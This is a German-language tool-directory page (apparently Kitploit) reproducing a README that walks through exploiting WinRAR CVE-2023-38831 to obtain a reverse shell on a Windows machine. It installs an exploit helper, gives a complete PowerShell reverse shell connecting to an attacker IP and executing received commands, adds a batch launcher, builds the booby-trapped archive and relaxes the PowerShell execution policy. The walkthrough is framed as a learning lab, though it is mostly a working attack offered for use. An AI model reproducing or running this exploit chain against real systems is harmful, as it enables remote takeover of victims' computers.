Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-38831_ReverseShell_Winrar-RCE — Erforderliche Schritte, um eine Reverse Shell durch Ausnutzen der WinRAR-Schwachstelle CVE-2023-38831 in Versionen vor 6.23 zu erhalten. | Kitploit
Tools/GitHubGitHub/maalfer/cve-2023-38831_reverseshell_winrar-rce
ExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-EntwicklungLabs & Praxis
GitHubmaalfer/cve-2023-38831_reverseshell_winrar-rce

CVE-2023-38831_ReverseShell_Winrar-RCE

Erforderliche Schritte, um eine Reverse Shell durch Ausnutzen der WinRAR-Schwachstelle CVE-2023-38831 in Versionen vor 6.23 zu erhalten.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
228vor 2 JahrenVon Kitploit geprüft

ERHALTEN EINER REVERSE-SHELL DURCH AUSNUTZUNG DER SCHWACHSTELLE CVE-2023-38831 IN WINRAR

In diesem Repository nutzen wir die WinRAR-Schwachstelle CVE-2023-38831 aus, um eine Reverse-Shell vom Windows-Zielrechner auf den Kali-Linux-Angreiferrechner zu erhalten.

VORBEREITENDE SCHRITTE

Laden Sie den Inhalt dieses Repositorys herunter:

imagen

Als Nächstes müssen wir die erforderlichen Python-Abhängigkeiten installieren, um diese Schwachstelle mit den folgenden Befehlen ausnutzen zu können:

root@kitploit:~
pip install rarce

imagen

VORBEREITUNGEN

Wir werden einen bösartigen Code ausführen, der uns eine Reverse-Shell liefert, stammend von der Website revshells.com (unter Angabe der entsprechenden IP und des Ports des Angreifers):

https://www.revshells.com/

imagen

root@kitploit:~
$LHOST = "192.168.0.36"; $LPORT = 443; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()

Diesen PowerShell-Code speichern wir in einer .ps1-Datei (wird später ausgeführt):

imagen

Sobald wir den Code in ps1 zur Erlangung der Reverse-Shell haben, erstellen wir eine Python-Datei, die mithilfe der os-Bibliothek die .ps1-Datei ausführt:

imagen

Danach erstellen wir eine .bat-Datei mit folgendem Code:

imagen

root@kitploit:~

rem Ruta al ejecutable de Python
set PYTHON_EXECUTABLE=python.exe

rem Ruta al script de Python que deseas ejecutar
set PYTHON_SCRIPT=pwned.py

rem Ejecutar el script de Python
%PYTHON_EXECUTABLE% %PYTHON_SCRIPT%

rem Pausa para que puedas ver la salida antes de que se cierre la ventana
pause

AUSNUTZUNG

An diesem Punkt müssen wir die bösartige WinRAR-Datei erstellen:

imagen

Wir führen die Datei dokument.pdf innerhalb der .rar-Datei aus:

imagen

imagen

Schließlich, wenn wir auf dem Angreiferrechner mit netcat im Lauschmodus bleiben, haben wir die Reverse-Shell empfangen:

imagen

LÖSUNG MÖGLICHER FEHLER:

Falls PowerShell-Befehle nicht ausgeführt werden können, ist es notwendig, die Ausführung von Skripten auf unserem System zu aktivieren:

imagen

imagen

Wir aktivieren es:

imagen

Und führen den folgenden Befehl aus:

Set-ExecutionPolicy RemoteSigned -Scope CurrentUser

Tool herunterladen